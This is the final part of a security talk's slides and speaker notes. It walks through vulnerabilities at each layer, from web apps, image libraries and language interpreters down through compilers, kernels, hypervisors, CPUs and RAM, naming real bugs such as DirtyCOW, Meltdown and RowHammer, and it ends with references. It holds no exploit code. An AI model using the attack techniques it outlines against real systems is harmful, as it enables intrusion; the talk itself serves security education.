• AMD microcode security update – Robert Święcki while fuzzing
kernel on home station
• Meltdown & Spectre — Jann Horn (Project Zero) et al
37. E xa m p l e s – C P U s 2 / 2
• Features?
• sandsifter – Fuzzing CPU (BlackHat 2017) by Christopher Domas
• Intel-SA-00086 – bugs in Intel Management Engine (ME)
38.
39. E xa m p l e s – R A M
• RowHammer – original idea and research by Thomas Dullien et al
(Project Zero) with further research done by other academics
• Initial research (2015) – affecting only desktops (local)
• Later (2016) – affecting mobile devices (local) and VM-to-VM
attacks (“local”)
• Now (2018) – affecting mobile devices (remotely!) and cloud
servers (remotely!)
41. Re fe re n c e s
• http://scholar.harvard.edu/files/mickens/files/theslowwinter.pdf
• https://wiki.osdev.org/CPU_Bugs
• https://danluu.com/cpu-bugs/
• https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/
• https://lists.debian.org/debian-security/2016/03/msg00084.html
• https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/
• https://meltdownattack.com/
• https://www.blackhat.com/docs/us-17/thursday/us-17-Domas-Breaking-The-x86-Instruction-Set-wp.pdf
• https://github.com/xoreaxeaxeax/sandsifter
• https://www.intel.com/content/www/us/en/support/articles/000025619/software.html
• https://blog.rapid7.com/2017/11/21/intel-sa-00086-security-bulletin-for-intel-management-engine-me-and-
advanced-management-technology-amt-vulnerabilities-what-you-need-to-know/
• https://www.blackhat.com/docs/eu-17/materials/eu-17-Goryachy-How-To-Hack-A-Turned-Off-Computer-Or-
Running-Unsigned-Code-In-Intel-Management-Engine.pdf
• https://en.wikipedia.org/wiki/Row_hammer
• https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
• https://www.vusec.net/projects/flip-feng-shui/
• https://www.vusec.net/projects/glitch/
42. Re fe re n c e s
• https://www.cs.vu.nl/~herbertb/download/papers/throwhammer_atc18.pdf
• https://arxiv.org/abs/1805.04956
43. S u m ma r y
• Software is broken
• Hardware is broken and we’re in early stage
• Best practices on each and every level reduce the risk but cannot
completely remove it
• Security is a process, not a product
I break things since my childhood years, professionally since 2010
I’ve worked in various roles, all were around application security or software engineering in general
Mostly offensive security, but at this point more and more defensive side (improving the state)
Application Security across entire technological stack — web applications are broken and they use boken external components. All of this is executed via broken interpreter (or VM) which is compiled with untrusted compiler on the broken operating system that is running within untrusted hypervisor. And underneath it all we have broken hardware.
Practical approach with real-world examples
Ok, imagine this: we got an excellent start-up idea which is an app for sharing cat pictures; we’ve made our MVP and our journey just started
Basic functionality: we have users (with avatars) and cat pictures (that are uploaded by the users). Additionally we have a simple admin panel for managing users with request logging functionality (UA, referrer, request payload)
Most of the vulnerabilities seen in the picture are in web apps
We can see growing trend
This data is not ideal
Source is non-profit
Iceberg case – we see only what’s above the surface (e.g. we don’t include vendor-proprietary web apps such as GMail or other SaaS)
During one of many engagements I found stored XSS in logging mechanism for user’s requests (application was sanitizing the paylod but not Referrer or UA)
Later in the code there was an RCE bug within upload functionality (no file type checking, PHP execution turned on for all directories)
Attack scenario: target users via XSS, use RCE to infiltrate the server – we have 2018 and these things are still there
Good examples is Ruby on Rails which out of the box gives us fairly good security posture
Things that can be automated, should be automated (e.g. SAST, DAST, vulnerable dependency scanners embedded into CI/CD pipeline)
Bummer: logical bugs will still be there
Let’s assume we’ve eliminated low-hanging fruits with Secure SDLC
However, for avatar and cat picutres themselves we use external modules: library provided by our package manager which additionaly uses ImageMagick as an actual tool that does the job
Now all problems within the library itself and ImageMagick are also OUR problems!
1 of params in the /edit/proces end-point was vulnerable to OS command injection because GraphicsMagick allows pipes | in the file names; Imgur paid 5k
Bugs found by Chris allowed to read memory from affected production servers, in practical term you could (at least!) read images from other users of the Dropbox or Yahoo! Mail; Yahoo! Paid 14k for this bug
Additionally bugs such as these can be helpful in beating the ASLR remotely
Also, think about all these dektop applications that use libraries left-and-right
Do you really need this external component? And if you do
Is it well-known widely used?
Do you know its security track-record? (how many CVEs?, how many issues?, etc
Sandboxing for binaries is a good practice
On a side note: Yahoo! Solved the issues with ImageMagick by removing it from its toolchain
Ok, we’ve removed ImageMagick from our toolchain by using GAvatar
However, we’re unserializing data from the user, we do validate the data though so it’s safe
Unless we have a bug in the implementation of unserialize() itself
From my experience developers that use high-level languages (Ruby, Python, etc) usually are surprised that the vulnertability can be in the native interpreter of their language (of course we’re taking into account only „interesting” parts of the language, e.g. JSON parser)
Which language interpreter are we looking at?
PHP (original ZEND implementation, not HHVM)
Easier one… ;)
First problem was a bug in deserialization of user’s data but… exploitation took an unusual route – attackers used fuzzing to discover vulnerability in PHP’s unserialize() function and attacked the interpreter itself gaining RCE
20k od PornHuba i 2k (1 per bug) od IBB-PHP
BTW. In 2017 PHP announced that it no longer see unserialize() bugs as security issues – they claim that input should be trusted. Smart move because there was many bugs in their implementation…
Shopify wanted to give their users ability to execute some subset of Ruby on their server; they used mruby (embedded ruby) for that purpose and started bug bounty to get rid of low hanging fruits
In 1 month they had so many reports they needed to scale-down payments to 10% of the original (20k for RCE = after scaling 2k). In half a year they spend HALF a milion of USD for bounties (including scaled-down reports)
Btw. Mruby is made and maintained by matz who is original creator of ruby and knows his C quite well
Targets were: Python / Ruby / PHP / JS
Apparently you can find Edge cases which (even though they are valid) lead to interesting behaviours that can be used for attacks
My own research into C implementations of Ruby, Python, PHP and HHVM
1M iterations each
Key take away: lots of crashes for only 1M iterations. Even if most is not exploitable it shows low quality of the software itself (bear in mind that some of the players are Facebook…)
Btw. Pythonauts — python has smaller numer of crashes but I didn’t fuzz it for 1M but only 100k
At this point (as far as I know) only Rust is actively fuzzing their own project
Shopify implemented as sandbox, hence each new bug must also affect the sandbox (lowers the number of payouts significantly but not completely eliminates them…)
For example on SCM-level before adding a commit, or more radical solution: nullify whole implementation on interpreter level (e.g. return void for unserialize() in PHP)
Ok, we’ve solved problems with inteprreters/VMs, our programmers are well trained but…
Our interpreter or VM still needs to be compiled (by us or our packages provider)
Can we guarantee integrity of our internal (or external) compiler? Hard to do in 100%, and this opens up doors for backdoors…
And of course we can have bugs in compilers themselves
PDBs are debugging info; j00ru found that on MS servers there are PDBs compiled with vulnerable version of VS that include leaked memory from compilation phase (around 0.5%) -- nothing big BUT very interesting case in point
On a certain level of sophistication there are no perfect solutions. We need to trust blindly that some elements of our chain are good
Ok, we’ve accepted the risk with compilers, we’ve eliminated bugs in our apps and their dependencies, our interpreters can be trusted
Now we want to deploy and see our MVP in action
We buy shared hosting with LAMP stack and roll-out
Change in threat-model:
CPU has different levels of trust when it comes to code execution
Modern OS-es use mainly 2 of them: Kernel-mode (ring0) and User-mode (ring3)
We assume that attacker is already inside (by any means) and game is about privilege escalation
Btw. Can we trust our neighbours when it comes to shared-hosting? vulnerabilities in their application affect all tenants on the particular server
But the number is bigger for sure (Linus and others in Linux Kernel community are well-known for mistreating security issues by claiming these are bugs until clearly proven otherwise)
They also don’t like applying for CVEs
We’re focusing on privilege escalation vulnerabilities hence because kernel is shared (ntoskernel) these are usually cross-version
Linux is king of the infrastructure, Windows is king of the end-points
DirtyCOW
Race condition in memory handling mechanism when kernel does Copy-on-Write
Key take-away: Since 2007 (kernel 2.6.22) until 2016 (kernel 4.x), 9 years
KiTrap0D
Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
Key take-away: Since original release of NT, 27.07.1993 until 2010
All 32bits versions of Windows: Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7
POPSS, Cross-platform OS vuln
Zła interpretacja manuali Intela spowodowała złe implementacje mechanizmu w rózynch OS-ach co w efekcie daje możliwość podniesienia uprawnień procesu
Bad iterpretation of Intel’s manuals lead to wrong implementation of this mechanism across different OS-es, effectively giving a way to elevate privileges
Including: Windows, MacOS, FreeBSD, and Linux (at least crash)
Hardening can be split into 2 areas:
Implementation of best practices (e.g. CIS Benchmarks)
Implementation of additional defenses
grsecurity dla Linuxa
BONUS: LKRG od Adama Zabłockiego
EMET (Enhanced Mitigation Experience Toolkit) for older Windows, EOL July 2018
PMMT (Process Mitigation Management Tool) and WDEG (Windows Defender Exploit Guard)
Shared hosting is for old people, cool kids rock the cloud
Now, our applications live in a hostel with dynamically changing neighbours
Bar has been raised, attacker needs to enter, then elevate their privileges, and escape from the hypervisor – doubleplusgood so far…
First public exploit for Vmware with full technical advisory, it opened up eyes of many people (Kostya Korchinsky from IMMUNITY)
Piotr Bania wrote and exploit for that
What’s pwn2own
Virtualization included in the competition since 2016, with success
Defense in depth: robust chain of defenses including: firewalls / network IDS to control access to virtual machines, running anti-virus or other host IDS to block malicious software from running on a virtual machine, and the hypervisor itself to isolate virtual machines from each other.
At some point in time, any of these layers may miss something important or have a bug; the goal is to have enough layers that not all can be breached simultaneously.
Ok, ok, ok, we’ve rewritten everything in Rust and our problems were solved (trolololo).
Can we trust our hardware?
Side-channels are the new black
Good example of a side channel is a conversation. Main information is exchanged through spoken word BUT our micro-expressions are side-channels
FDIV is important because Intel lost money “In December 1994, Intel recalled the defective processors. (…) $475 million (…) total cost associated with replacement of the flawed processors.”
SYSRET interesting because it was fixed by Linux in 2006, however devs didn’t fully understood implications and didn’t notified other OS vendors until Rafał’s revelation
AMD microcode interesting because it was found ‘by accident’ while fuzzing software on AMD-based machine
Meltdown & Spectre interesting from both technical POV and social one – it was found by 3 independent teams around exact same time (without any information coordination), on top of that there was already ‘a hunch’ in the air introduced most notably by Anders Fogh and his ‘negative results’ blog post).
Fuzzing CPU interesting because new opcodes were found; question time: are those glitches or features?
Intel ME and MINIX inside (yes, academic microkernel) with highest level of trust within your computer, because what can go wrong?
Today’s RAMs are built very tightly, physically there are _very_ close to each other – technically it’s possible to Read memory in a certain way to affect neighbouring memory cells (flipping them) hence we’re able to affect integrity of a live system (we have 0-1 everywhere, if we can flip certain 1 to 0 we can change our privileges).
Hammering attacks require some kind of code execution hence they were local in the beginning. However, nowadays it’s possible to perform them remotely with e.g. WebGL in your browser (via GPU + Android on ARM) and remote direct memory access (RDMA) networking (cloud server)